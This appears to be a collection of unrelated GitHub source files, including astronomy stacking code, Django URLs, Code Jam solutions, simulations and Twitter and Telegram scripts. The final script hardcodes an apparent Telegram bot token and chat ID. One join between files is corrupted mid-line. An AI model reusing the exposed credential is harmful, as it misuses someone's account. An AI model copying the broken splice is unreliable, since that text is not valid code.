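    return [a[inds] for a in arrays]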
np.random.seed(100)\n inds = np.random.choice(Ntot,size=nmax,replace=False)\n ras = ras[inds]\n decs = decs[inds]\n ws = ws[inds]\n zs = zs[inds]\n\n elif cat_type=='wise_panstarrs':\n if is_meanfield:\n # made using mapcat.py followed by randcat.py\n catalogue_name = paths.data+ 'wise_panstarrs_randoms.txt'\n else:\n catalogue_name = paths.data+ 'wise_panstarrs_radec.txt'\n ras,decs = np.loadtxt(catalogue_name,unpack=True)\n ras = ras[:nmax]\n decs = decs[:nmax]\n ws = ras*0 + 1\n\n elif cat_type=='madcows_photz':\n if is_meanfield:\n # made using mapcat.py followed by randcat.py\n catalogue_name = paths.data+ 'madcows_photz_randoms.txt'\n ras,decs = np.loadtxt(catalogue_name,unpack=True)\n zs = ras*0\n else:\n catalogue_name = paths.data+ 'madcows_cleaned.txt'\n ras,decs,zs,sns = np.genfromtxt(catalogue_name,usecols=[2,3,6,8],unpack=True,delimiter=',')\n ras = ras[zs>0]\n decs = decs[zs>0]\n sns = sns[zs>0]\n zs = zs[zs>0]\n\n ras = ras[sns>0]\n decs = decs[sns>0]\n zs = zs[sns>0]\n sns = sns[sns>0]\n\n ras,decs,sns,zs = cut_z_sn(ras,decs,sns,zs,zmin,zmax,snmin,snmax)\n\n\n sns = sns[:nmax]\n data['lams'] = sns\n\n zs = zs[:nmax]\n ras = ras[:nmax]\n decs = decs[:nmax]\n ws = ras*0 + 1\n\n elif cat_type=='hsc_camira':\n if is_meanfield:\n catalogue_name = paths.data+ 'rand_comb_s19a_wide_sm_z084.dat'\n ras,decs = np.loadtxt(catalogue_name,unpack=True)\n sns = None\n zs = ras*0\n else:\n catalogue_name = paths.data+ 'camira_s19a_wide_sm_v1_01z11.dat'\n ras,decs,sns,zs = np.loadtxt(catalogue_name,unpack=True)\n ras,decs,sns,zs = cut_z_sn(ras,decs,sns,zs,zmin,zmax,snmin,snmax)\n\n ras = ras[:nmax]\n decs = decs[:nmax]\n zs = zs[:nmax]\n if not(is_meanfield):\n sns = sns[:nmax]\n data['lams'] = sns\n ws = ras*0 + 1\n\n elif cat_type=='vrec_cmass':\n ras,decs,zs,ws = load_vrec_catalog_boss(paths.boss_vrec_data + 'catalog.txt')\n ws = -ws[decs<25] / 299792. # (-v/c)\n ras = ras[decs<25]\n zs = zs[decs<25]\n decs = decs[decs<25]\n\n ras = ras[:nmax]\n decs = decs[:nmax]\n zs = zs[:nmax]\n ws = ws[:nmax]\n\n data['lams'] = ws*0\n \n \n else:\n raise NotImplementedError\n \n return ras,decs,zs,ws,data\n\ndef load_beam(freq):\n #if freq=='f150': fname = paths.data+'s16_pa2_f150_nohwp_night_beam_tform_jitter.txt'\n #elif freq=='f090': fname = paths.data+'s16_pa3_f090_nohwp_night_beam_tform_jitter.txt'\n if freq=='f150': fname = paths.data+'corrected_beam_150.txt'\n elif freq=='f090': fname = paths.data+'corrected_beam_090.txt'\n ls,bls = np.loadtxt(fname,usecols=[0,1],unpack=True)\n assert ls[0]==0\n bls = bls / bls[0]\n return maps.interp(ls,bls)\n\n\n\n\ndef load_dumped_stats(mvstr,get_extra=False):\n savedir = paths.scratch + f\"/{mvstr}/\"\n assert os.path.exists(savedir), f\"The path corresponding to {savedir} does not exist. 
If this is a meanfield, are you sure the parameters for your current run match the parameters in any existing meanfield directories?\" \n s = stats.load_stats(f'{savedir}')\n shape,wcs = enmap.read_map_geometry(f'{savedir}/map_geometry.fits')\n if get_extra:\n kmask = enmap.read_map(f'{savedir}/kmask.fits')\n modrmap = enmap.read_map(f'{savedir}/modrmap.fits')\n bin_edges = np.loadtxt(f'{savedir}/bin_edges.txt')\n assert wcsutils.equal(kmask.wcs,modrmap.wcs)\n assert wcsutils.equal(kmask.wcs,wcs)\n try:\n with open(f'{savedir}/cat_data_columns.txt', 'r') as file:\n columns = file.read().replace('\\n', '').split(' ')\n data = {}\n dat = np.load(f\"{savedir}/mstats_dump_vectors_data.npy\")\n assert len(columns)==dat.shape[1]\n for i,col in enumerate(columns):\n data[col] = dat[:,i]\n except:\n data = None\n try:\n profs = np.loadtxt(f\"{savedir}/profiles.txt\")\n except:\n profs = None\n return s, shape, wcs, kmask, modrmap, bin_edges,data,profs\n else:\n return s, shape, wcs\n\n\n\ndef analyze(s,wcs):\n N_stamp = s.vectors['kw'].shape[0]\n V1 = s.vectors['kw'].sum()\n V2 = s.vectors['kw2'].sum()\n kmap = enmap.enmap(s.stacks['kmap']*N_stamp / V1,wcs)\n\n try:\n unweighted_stack = enmap.enmap(s.stacks['ustack'],wcs)\n except:\n unweighted_stack = None\n\n nmean_weighted_kappa_stack = kmap.copy()\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n kstack = enmap.enmap((s.stacks['wk_real'] + 1j*s.stacks['wk_imag']) / s.stacks['wk_iwt'],wcs)\n kstack[~np.isfinite(kstack)] = 0\n kmap = enmap.ifft(kstack,normalize='phys').real\n opt_weighted_kappa_stack = kmap.copy()\n\n\n opt_binned = s.vectors['wk1d'].sum(axis=0) / V1\n diff = s.vectors['k1d'] - opt_binned\n cov = np.dot((diff * s.vectors['kw']).T,diff) / (V1-(V2/V1))\n opt_covm = cov/N_stamp\n opt_corr = stats.cov2corr(opt_covm)\n opt_errs = np.sqrt(np.diag(opt_covm))\n\n binned = s.stats['k1d']['mean']\n covm = s.stats['k1d']['covmean']\n corr = stats.cov2corr(s.stats['k1d']['covmean'])\n errs = s.stats['k1d']['errmean']\n\n\n return unweighted_stack,nmean_weighted_kappa_stack,opt_weighted_kappa_stack,opt_binned,opt_covm,opt_corr,opt_errs,binned,covm,corr,errs\n \n \n\n\ndef plot(fname,stamp,tap_per,pad_per,crop=None,lim=None,cmap='coolwarm',quiver=None,label='$\\\\kappa$ (dimensionless)'):\n kmap = stamp\n trimy = int((tap_per+pad_per)/100. * kmap.shape[0])\n trimx = int((tap_per+pad_per)/100. 
* kmap.shape[1])\n if trimy>0 and trimx>0:\n tmap = kmap[trimy:-trimy,trimx:-trimx]\n else:\n tmap = kmap\n if crop is not None:\n tmap = maps.crop_center(tmap,crop)\n zfact = tmap.shape[0]*1./kmap.shape[0]\n twidth = tmap.extent()[0]/putils.arcmin\n io.plot_img(tmap,fname, flip=False, ftsize=12, ticksize=10,arc_width=twidth,xlabel='$\\\\theta_x$ (arcmin)',ylabel='$\\\\theta_y$ (arcmin)',cmap=cmap,lim=lim,quiver=quiver,label=label)\n\n\n\n\ndef get_hdv_cc():\n from szar import counts\n ombh2 = 0.0223\n om = 0.24\n h = 0.73\n ns = 0.958\n omb = ombh2 / h**2\n omc = om - omb\n omch2 = omc * h**2.\n As = cosmology.As_from_s8(sigma8 = 0.76,bounds=[1.9e-9,2.5e-9],rtol=1e-4,omegab = omb, omegac = omc, ns = ns, h = h)\n print(As)\n params = {}\n params['As'] = As\n params['H0'] = h * 100.\n params['omch2'] = omch2\n params['ombh2'] = ombh2\n params['ns'] = ns\n params['mnu'] = 0.0\n\n conc = 3.2\n cc = counts.ClusterCosmology(params,skipCls=True,skipPower=True,skip_growth=True)\n return cc\n\n\ndef get_seed(tag,task,is_meanfield):\n if tag=='lensed':\n return (0,task)\n elif tag=='mf':\n return (1,task)\n else:\n i = 1 if is_meanfield else 0\n if tag=='noise_plc':\n return (2,i,task)\n elif tag=='noise_act_150':\n return (3,i,task)\n elif tag=='noise_act_90':\n return (4,i,task)\n\nclass Simulator(object):\n \n def __init__(self,is_meanfield,stamp_width_arcmin,pix_arcmin,lensed_version,\n plc_rms,act_150_rms,act_90_rms):\n\n \"\"\"\n \n \"\"\"\n self.plc_rms=plc_rms \n self.act_150_rms=act_150_rms \n self.act_90_rms=act_90_rms\n bfact = float(re.search(rf'bfact_(.*?)_pfact', lensed_version).group(1))\n npix = int(stamp_width_arcmin * bfact / pix_arcmin)\n self.dnpix = int(stamp_width_arcmin / (pix_arcmin))\n shape,wcs = enmap.geometry(pos=(0,0),res=putils.arcmin * pix_arcmin,shape=(npix,npix),proj='plain')\n cshape,cwcs = enmap.geometry(pos=(0,0),res=putils.arcmin * pix_arcmin,shape=(self.dnpix,self.dnpix),proj='plain')\n self.cwcs = cwcs\n self.ipsizemap = enmap.pixsizemap(cshape,cwcs)\n theory = cosmology.default_theory()\n self.shape,self.wcs = shape,wcs\n self.modlmap = enmap.modlmap(shape,wcs)\n self.is_meanfield = is_meanfield\n self.planck_beam = maps.gauss_beam(self.modlmap,defaults.planck_smica_beam_fwhm)\n wy, wx = enmap.calc_window(self.shape)\n act_pixwin = wy[:,None] * wx[None,:]\n self.act_150_beam = load_beam('f150')(self.modlmap) * act_pixwin\n self.act_90_beam = load_beam('f090')(self.modlmap) * act_pixwin\n if self.is_meanfield:\n ucltt = theory.uCl('TT',self.modlmap)\n self.mgen = maps.MapGen((1,)+self.shape,self.wcs,ucltt[None,None])\n else:\n self.savedir = paths.scratch + f\"/{lensed_version}/\"\n \n def load_kmap(self,task):\n if self.is_meanfield:\n return self.mgen.get_map(seed=get_seed(\"mf\",task,self.is_meanfield),harm=True)[0]\n else:\n kreal = enmap.read_map(f'{self.savedir}lensed_kmap_real_{task:06d}.fits',sel=np.s_[0,...])\n kimag = enmap.read_map(f'{self.savedir}lensed_kmap_imag_{task:06d}.fits',sel=np.s_[0,...])\n assert wcsutils.equal(kreal.wcs,self.wcs)\n assert wcsutils.equal(kimag.wcs,self.wcs)\n return enmap.enmap(kreal + 1j*kimag,self.wcs)\n\n def apply_pix_beam_slice(self,kmap,exp):\n if exp=='plc':\n beam = self.planck_beam\n elif exp=='act_150':\n beam = self.act_150_beam\n elif exp=='act_90':\n beam = self.act_90_beam\n ret = maps.crop_center(enmap.ifft(kmap * beam,normalize='phys').real,self.dnpix)\n assert wcsutils.equal(ret.wcs,self.cwcs)\n return ret\n \n def get_obs(self,task):\n kmap = self.load_kmap(task) \n kmap *= kmap.pixsize()**0.5 # apply 
physical normalization, since this is turned off in make_lensed_sims.py and MapGen\n imap_plc = self.apply_pix_beam_slice(kmap,'plc')\n imap_act_150 = self.apply_pix_beam_slice(kmap,'act_150')\n imap_act_90 = self.apply_pix_beam_slice(kmap,'act_90')\n \n shape,wcs = imap_plc.shape,imap_plc.wcs\n noise_planck = maps.white_noise(shape,wcs,self.plc_rms,seed=get_seed(\"noise_plc\",task,self.is_meanfield),ipsizemap=self.ipsizemap)\n noise_act_150 = maps.white_noise(shape,wcs,self.act_150_rms,seed=get_seed(\"noise_act_150\",task,self.is_meanfield),ipsizemap=self.ipsizemap)\n noise_act_90 = maps.white_noise(shape,wcs,self.act_90_rms,seed=get_seed(\"noise_act_90\",task,self.is_meanfield),ipsizemap=self.ipsizemap)\n\n return imap_plc + noise_planck, imap_act_150 + noise_act_150, imap_act_90 + noise_act_90\n\n\n\ndef load_vrec_catalog_boss(pathOutCatalog):\n \"\"\"\n Code from Emmanuel Schaan to load in a BOSS v_rec catalog\n \"\"\"\n data = np.genfromtxt(pathOutCatalog)\n nObj = len(data[:,0])\n #\n # sky coordinates and redshift\n RA = data[:,0] # [deg]\n DEC = data[:,1] # [deg]\n Z = data[:,2]\n #\n # observed cartesian coordinates\n # coordX = data[:,3] # [Mpc/h]\n # coordY = data[:,4] # [Mpc/h]\n # coordZ = data[:,5] # [Mpc/h]\n # #\n # # displacement from difference,\n # # not including the Kaiser displacement,\n # # from differences of the observed and reconstructed fields\n # dX = data[:,6] # [Mpc/h]\n # dY = data[:,7] # [Mpc/h]\n # dZ = data[:,8] # [Mpc/h]\n # #\n # # Kaiser-only displacement\n # # originally from differences of the observed and reconstructed fields\n # dXKaiser = data[:,9] # [Mpc/h] from cartesian catalog difference\n # dYKaiser = data[:,10] # [Mpc/h]\n # dZKaiser = data[:,11] # [Mpc/h]\n # #\n # # velocity in cartesian coordinates\n # vX = data[:,12] #[km/s]\n # vY = data[:,13] #[km/s]\n # vZ = data[:,14] #[km/s]\n #\n # velocity in spherical coordinates,\n # from catalog of spherical displacements\n vR = data[:,15] # [km/s] from spherical catalog, >0 away from us\n # vTheta = data[:,16] # [km/s]\n # vPhi = data[:,17] # [km/s]\n # #\n # # Stellar masses\n # Mstellar = data[:,18] # [M_sun], from Maraston et al\n # #\n # # Halo mass\n # hasM = data[:,19]\n # Mvir = data[:,20] # [M_sun]\n # #\n # # Integrated optical depth [dimless]: int d^2theta n_e^2d sigma_T = (total nb of electrons) * sigma_T / (a chi)^2\n # integratedTau = data[:,21] # [dimless]\n # #\n # # Integrated kSZ signal [muK * sr]: int d^2theta n_e sigma_T (-v/c) Tcmb\n # integratedKSZ = data[:, 22] # [muK * sr]\n # #\n # # Integrated Y signal [sr]: int d^2theta n_e sigma_T (kB Te / me c^2)\n # # needs to be multiplied by Tcmb * f(nu) to get muK\n # integratedY = data[:, 23] # [sr]\n return RA,DEC,Z,vR\n\n\ndef postprocess(stack_path,mf_path,save_name=None,ignore_param=False,args=None,ignore_last=None):\n\n if mf_path != \"\":\n smf_path = mf_path if (ignore_last is None) else mf_path[:-ignore_last]\n mf_paramstr = re.search(rf'plmin_(.*?)_meanfield', smf_path).group(1)\n sstack_path = stack_path if (ignore_last is None) else stack_path[:-ignore_last]\n st_paramstr = re.search(rf'plmin_(.*)', sstack_path).group(1)\n\n if not(ignore_param):\n if mf_path != \"\":\n try:\n assert mf_paramstr==st_paramstr\n except:\n print(mf_paramstr)\n print(st_paramstr)\n print(\"ERROR: The parameters for the stack and mean-field do not match.\")\n raise\n\n tap_per = float(re.search(rf'tapper_(.*?)_padper', stack_path).group(1))\n pad_per = float(re.search(rf'padper_(.*?)_', stack_path).group(1))\n stamp_width_arcmin = 
float(re.search(rf'swidth_(.*?)_tapper', stack_path).group(1))\n klmin = int(re.search(rf'klmin_(.*?)_klmax', stack_path).group(1))\n klmax = int(re.search(rf'klmax_(.*?)_lxcut', stack_path).group(1))\n\n\n s_stack, shape_stack, wcs_stack, kmask, modrmap, bin_edges,data,profs = load_dumped_stats(stack_path,get_extra=True)\n if not(save_name is None):\n save_dir = f'{paths.postprocess_path}/{save_name}'\n io.mkdir(f'{save_dir}')\n if data is not None: \n io.save_cols(f'{save_dir}/{save_name}_catalog_data.txt',[data[key] for key in sorted(data.keys())],header=' '.join([key for key in sorted(data.keys())]))\n\n if mf_path != \"\":\n s_mf, shape_mf, wcs_mf = load_dumped_stats(mf_path)\n\n if mf_path != \"\":\n assert np.all(shape_stack==shape_mf)\n assert wcsutils.equal(wcs_stack,wcs_mf)\n assert np.all(shape_stack==kmask.shape)\n\n shape = shape_stack\n wcs = wcs_stack\n cents = (bin_edges[:-1]+bin_edges[1:])/2.\n if not(save_name is None):\n crop = int(args.cwidth / defaults.pix_width_arcmin)\n\n unweighted_stack,nmean_weighted_kappa_stack,opt_weighted_kappa_stack,opt_binned,opt_covm,opt_corr,opt_errs,binned,covm,corr,errs = analyze(s_stack,wcs)\n if mf_path != \"\":\n mf_unweighted_stack,mf_nmean_weighted_kappa_stack,mf_opt_weighted_kappa_stack,mf_opt_binned,mf_opt_covm,mf_opt_corr,mf_opt_errs,mf_binned,mf_covm,mf_corr,mf_errs = analyze(s_mf,wcs)\n\n # if profs is not None:\n # profs = profs - mf_binned\n # arcmax = 8.\n # profs = profs[:,cents0]\n arcmax = args.arcmax\n nbins = bin_edges[bin_edges\d+)$', login_required(editar), name=\"editar\"),\n url(r'^borrar/(?P\\d+)$', login_required(borrar), name=\"borrar\"),\n url(r'^charts$', login_required(charts), name=\"charts\"),\n #url(r'^nuevo_usuario$', nuevo_usuario, name=\"nuevo_usuario\"),\n #url(r'^cerrar_sesion$', login_required(logout_view), name=\"cerrar_sesion\"),\n #url(r'^ingresar_usuario/$', ingresar, name=\"ingresar_usuario\"),\n #url(r'^accounts/login/', ingresar)\n #url(r'^borrar/(?P\\d+)$', BancoDelete.as_view() , name=\"borrar\"),\n]","repo_name":"diegoquirozramirez/DjangoWeb","sub_path":"Apps/Banco/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} {"seq_id":"23455852081","text":"import os\n\n# Determine the number of test cases\nwith open(os.path.expanduser('~/Downloads/A-small-attempt1.in'), 'r') as f:\n n_cases = int(f.readline())\n\ndef test_ovation(d, shyness, t):\n needed = [0]\n for k in range(0, len(shyness)):\n if d[k] < k+1:\n needed.append(k+1 - d[k])\n with open('output.txt', 'a') as f:\n f.write(\"Case #%s: %s\" % (t, max(needed)))\n\nfor t in xrange(1, (n_cases + 1)):\n f = open(os.path.expanduser('~/Downloads/A-small-attempt1.in'))\n for i, l in enumerate(f):\n if i == t:\n shyness = list(l[2:-1])\n d = {k: 0 for k in range(0, len(shyness))}\n for k in range(0, len(shyness)):\n # Initialize a dictionary with the number of people that would be standing\n # if everyone at each level stood up.\n if k == 0:\n d[k] += int(shyness[k])\n else:\n d[k] += (d[k-1] + int(shyness[k]))\n test_ovation(d, shyness, t)\n if t < n_cases + 1:\n with open('output.txt', 'a') as f:\n f.write('\\n')\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/3710.py","file_name":"3710.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} {"seq_id":"2514487093","text":"import numpy as 
np\r\nimport time\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\n\r\n# initialization of MPI communication\r\nfrom mpi4py import MPI\r\n\r\ncomm = MPI.COMM_WORLD\r\nprocess = MPI.COMM_WORLD.Get_rank()\r\nnumProcess = MPI.COMM_WORLD.Get_size()\r\n# command to run on terminal\r\n# mpirun -n 8 /bin/python3 /home/tr0fin0/Downloads/tmp_OS202/setup.py\r\n\r\nnombre_cas: int = 256\r\nnb_cellules: int = 360 # Cellules fantomes\r\nnb_iterations: int = 360\r\n\r\ncompute_time = 0.\r\ndisplay_time = 0.\r\n\r\n\r\n# add \"./images/\" to saving path to store all images separately from the main code.\r\ndef save_as_md(cells, symbols='⬜⬛'):\r\n res = np.empty(shape=cells.shape, dtype=' 0:\n x = n % 10\n if x > last:\n return False\n last = x\n n /= 10\n return True\n\ndef make_tidy(n):\n digits = []\n while n > 0:\n digits.append(n % 10)\n n /= 10\n digits = list(reversed(digits))\n last_num = 0\n for pos in xrange(len(digits)):\n if digits[pos] < last_num:\n num_to_care = digits[pos - 1]\n i = pos - 1\n while digits[i] == num_to_care:\n i -= 1\n if i == -1:\n break\n digits[i + 1] = num_to_care - 1\n '''for i in xrange(0, pos-1):\n if digits[i] > digits[pos-1]:\n digits[i] = digits[pos-1]'''\n for i in xrange(i + 2, len(digits)):\n digits[i] = 9\n break\n else:\n last_num = digits[pos]\n #print digits\n return reduce(lambda a, b: a*10 + b, digits)\n\ndef make_tidy_naive(n):\n while n > 0:\n if check_tidy(n):\n return n\n n -= 1\n\ninp = map(int, open(\"B-large.in\").read().split(\"\\n\"))\no = open(\"output.txt\", \"w\")\nfor x in xrange(1, len(inp)):\n #if make_tidy(inp[x]) != make_tidy_naive(inp[x]):\n # print inp[x], make_tidy(inp[x]), make_tidy_naive(inp[x])\n # break\n o.write(\"Case #\" + str(x) + \": \" + str(make_tidy(inp[x])) + \"\\n\")\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/3527.py","file_name":"3527.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37027370145","text":"import zmq\nimport random\nimport sys\nimport time\nport = \"500901\"\ncontext = zmq.Context()\nsocket = context.socket(zmq.PUB)\nsocket.bind(\"tcp://*:%s\" % port)\ntime.sleep(1)\n#\npath = \"/home/rl/countersLHCo/\"\n#\nrun = \"527345\"\nfilename = path + \"20221014.cc\"\n#\n#run = \"528543\"\n#run = \"528537\"\n#filename = path + \"20221102.cc\"\n#\n#run = \"527963\"\n#filename = path + \"20221024.cc\"\n#\n#run = \"527349\"\n#filename = path + \"20221015.cc\"\n#\nfilecfg = path + run + \".rcfg\"\n#\nif len(sys.argv) == 2:\n run = sys.argv[1]\n int(run)\nelif len(sys.argv) == 3:\n port = sys.argv[1]\n int(port)\n print(\"port:\", port)\nprint(\"run:\", run)\n#\n\n# CTP Config\ndef sendctpconfig(starttime):\n print(\"starttime:\",starttime)\n fcfg = open(filecfg,\"r\")\n lines = fcfg.readlines()\n ctpcfg = starttime+\" \"\n for line in lines:\n ctpcfg += line\n fcfg.close()\n print(ctpcfg)\n senddata(\"ctpconfig\",ctpcfg)\ndef senddata(header, messagedata):\n global socket\n data = messagedata\n if len(data) > 20:\n data = data[0:20]\n print(\"Sending:\",header, data)\n data = str(messagedata).encode('UTF-8')\n header = str(header).encode('UTF-8')\n test = str(\"test\").encode('UTF-8')\n msg = [header, data,test]\n socket.send_multipart(msg)\n time.sleep(1)\n##########################\n#\nf = open(filename,\"r\")\n#\nn = 0\nstart = time.time()\nruncnts = []\nrunactive = 0\nwhile True:\n line = f.readline()\n if not line:\n break\n items = line.split(\" \")\n runfound = 
0\n for i in range(1,17):\n if items[i] == run:\n runcnts.append(line)\n runfound = 1\n print(\"1:\",line[0:20])\n break;\n if (runfound == 1) and (runactive == 0):\n runactive = 1\n if (runfound == 0) and (runactive==1):\n runcnts.append(line)\n runactive = 0\n print(\"0:\",line[0:20])\n\nprint(\"runcnts size:\", len(runcnts))\nstarttime = runcnts[0].split(\" \",1)[0]\n#\nsendctpconfig(starttime)\ntime.sleep(5)\nsenddata(\"sox\",runcnts[0])\nfor line in runcnts[1:-1]:\n senddata(\"ctpd\",line)\nsenddata(\"eox\",runcnts[-1])\n\n\n\n","repo_name":"AliceO2Group/AliceO2","sub_path":"Detectors/CTP/workflowScalers/py/createCnts.py","file_name":"createCnts.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"61"} +{"seq_id":"44405147001","text":"import numpy as np\n\ndef R(angle):\n C, S = np.cos(angle), np.sin(angle)\n return np.array([[C,-S],[S,C]])\n\nclass Field:\n\n def __init__(self, h, dim, n=1):\n self.dim = dim\n self.h = h\n self.F = np.full(dim, n, dtype=float)\n\n def add_material(self, geometry, n):\n\n h = self.h\n Ny, Nx = self.dim\n \n \n for j in range(Nx):\n for i in range(Ny):\n x, y = h*j, h*(Ny-i)\n if geometry(x,y):\n self.F[i,j] = n\n\n def get(self):\n return self.F\n\n\nclass Lightbeam:\n\n def __init__(self, v, y0, tau):\n self.v = v/(v@v)**(0.5) # normalization\n self.y0 = y0\n self.tau = tau\n\n def propagate(self, F, T):\n v, y0, tau = self.v, self.y0, self.tau\n N, h = F.get(), F.h\n Ny, Nx = F.dim\n\n L = np.zeros((T+1, 2))\n L[0] = [0, y0]\n\n for t in range(T):\n L[t+1] = v*tau + L[t]\n j1, i1 = int(L[t,0]/h), int(L[t,1]/h)\n j2, i2 = int(L[t+1,0]/h), int(L[t+1,1]/h )\n if (j1 >= Nx) | (j2 >= Nx) | (i1 >= Ny) | (i2 >= Ny):\n L = L[:t+1]\n break\n if N[i1,j1] != N[i2,j2]:\n ni, nr = N[i1,j1], N[i2,j2]\n D = 20*int(Nx/Ny)\n for k in range(1,100):\n Un = N[i2+D, j2-k:j2+1+k] # upper row\n #print('U', Un)\n if (Un[0] == ni) & (nr in Un):\n Uj = k-np.min(np.where(Un == nr))\n break\n for k in range(1,100):\n Ln = N[i2-D, j2-k:j2+1+k] # lower row\n #print('L', Ln)\n if (Ln[0] == ni) & (nr in Ln):\n Lj = k-np.min(np.where(Ln == nr))\n break\n n = np.array([1, -(Uj-Lj)/(2*D)])\n #print(n)\n n = n/(n@n)**(0.5) # normalization\n c = n@v\n nr = ni/nr\n if c < 0:\n n = -n\n c = -c\n sinr = (nr**2)*(1-(c**2))\n if sinr > 1:\n v = 0\n else:\n v = nr*v + (nr*c-(1-sinr)**0.5)*n\n v = v/(v@v)**(0.5)\n return L\n\n\nimport matplotlib.pyplot as plt\n\na, b = 0.5, 2\nH, B = 1440, 3440\nh = 10**(-2)\nx0, y0 = B/4*h, H/2*h\n#geometry = lambda x, y: (abs(((x-x0)/a)**2-((y-y0)/b)**2) <= 1) & (abs(y-y0) <= 0.35*H*h)\n#geometry = lambda x, y: abs((y-y0)-2*(x-x0)) <= 2\n#geometry = lambda x, y: abs(((x-x0)/a)**2+((y-y0)/b)**2) < 0.35*H*h\n\ndef ellips(a,b,x0,y0):\n return lambda x,y: abs(((x-x0)/a)**2+((y-y0)/b)**2) < 0.35*H*h\n\ndef hyperbole(a,b,x0,y0):\n return lambda x,y: (abs(((x-x0)/a)**2-((y-y0)/b)**2) <= 1) & (abs(y-y0) <= 0.5*H*h)\n\nN = Field(h, (H,B))\nn = 1.7\n#N.add_material(hyperbole(a,b,x0,y0), n)\nN.add_material(ellips(a,b,x0,y0), n)\n\nfor i in range(0, 2):\n light = Lightbeam(np.array([np.cos(-np.pi*i/9),np.sin(-np.pi*i/9)]), H/2*h+200*h, h)\n L = light.propagate(N, B)\n x, y = L[:, 0]/h, L[:, 1]/h\n plt.plot(x,y, color=\"white\", lw=2)\nN = N.get()\nN[np.where(N==n)] = 2\n\nplt.plot(np.arange(0,B,1), np.full(B,H/2), ls='--')\nplt.imshow(N, cmap='RdBu', 
origin='lower')\nplt.savefig(\"N.png\")","repo_name":"vbelpair/Ugent","sub_path":"optics.py","file_name":"optics.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"23548519891","text":"fread = open('A-large.in')\nlines = fread.readlines()\nfw = open('output', 'w')\n\nT = int(lines[0][0:-1])\n\nfor t in range(T):\n line = lines[t+1].split(\" \")\n S = list(line[0])\n K = int(line[1])\n\n flips = 0\n for i in range(len(S)-K+1):\n if S[i]=='-':\n flips += 1\n for j in range(i, i+K):\n if S[j]=='+':\n S[j] = '-'\n else:\n S[j] = '+'\n\n allflipped = True\n for i in range(len(S)-K+1, len(S)):\n if S[i]=='-':\n allflipped = False\n\n result = ''\n if not allflipped:\n result = 'IMPOSSIBLE'\n else:\n result = str(flips)\n\n fw.write('Case #{}: {}\\n'.format(t+1, result))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/539.py","file_name":"539.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3481079484","text":"import tweepy,os,sys,json\nfrom functions import fun1\n\nwith open(os.path.join(os.getcwd(),\"tokens.json\")) as f:\n tokenData = json.load(f)\n\napi = fun1.initialiseAPIconnection(tokenData[\"consumerKey\"],tokenData[\"consumerSecretKey\"], tokenData[\"accessToken\"], tokenData[\"accessTokenSecret\"])\nusers = input(\"Please enter a user Id's with space seperation\\n\")\nlistOfUserIDs = users.split(\" \")\nfollowersList = []\nfriendsList = []\nfor userId in listOfUserIDs:\n if(not userId.isnumeric() or \".\" in userId):\n print(\"entered invalid user id:\"+ userId+\".....continuing with other user\")\n continue\n userId = int(userId)\n try:\n userInfo = api.get_user(user_id = userId)\n except tweepy.TweepError as e:\n print(\"exception thrown by tweepy\",e)\n continue\n for page in tweepy.Cursor(api.followers, user_id = userId,wait_on_rate_limit=True).pages():\n try:\n followersList.extend(page)\n except tweepy.TweepError as e:\n print(e)\n print(\"The followers list:\")\n for followerInfo in followersList:\n try:\n print(\" ->\"+followerInfo.screen_name)\n except tweepy.TweepError as e:\n print(e)\n\n # friends list\n for page in tweepy.Cursor(api.friends_ids, user_id = int(userId),wait_on_rate_limit=True,count=1000).pages():\n try:\n friendsList.extend(page)\n except tweepy.TweepError as e:\n print(e)\n userScreenName = userInfo.screen_name\n frieList = []\n print(\"The friends list:\")\n for friendId in friendsList:\n frieList = []\n friendScreenName = api.get_user(friendId).screen_name\n for page1 in tweepy.Cursor(api.friends, user_id = int(friendId),wait_on_rate_limit=True,count=1000).pages():\n try:\n frieList.extend(page1)\n except tweepy.TweepError as e:\n print(e)\n listOfFriendScreenNames = [f1.screen_name for f1 in frieList]\n if(userScreenName in listOfFriendScreenNames):\n print(\" ->\"+friendScreenName)\n","repo_name":"vajjasaikiran/projects","sub_path":"python/194161016-4/194161016_q1b.py","file_name":"194161016_q1b.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22648340854","text":"import cv2\r\nimport numpy as np\r\nimport telepot\r\nimport os\r\n\r\n\r\n\r\ntoken = '5751445359:AAFzaIht-oboCxA8RAuJPct4kBtDqR7a9vM'\r\n#id_penerima = 1441844129\r\nid_penerima = 1441844129\r\n\r\nlokasi = 'History'\r\nif not 
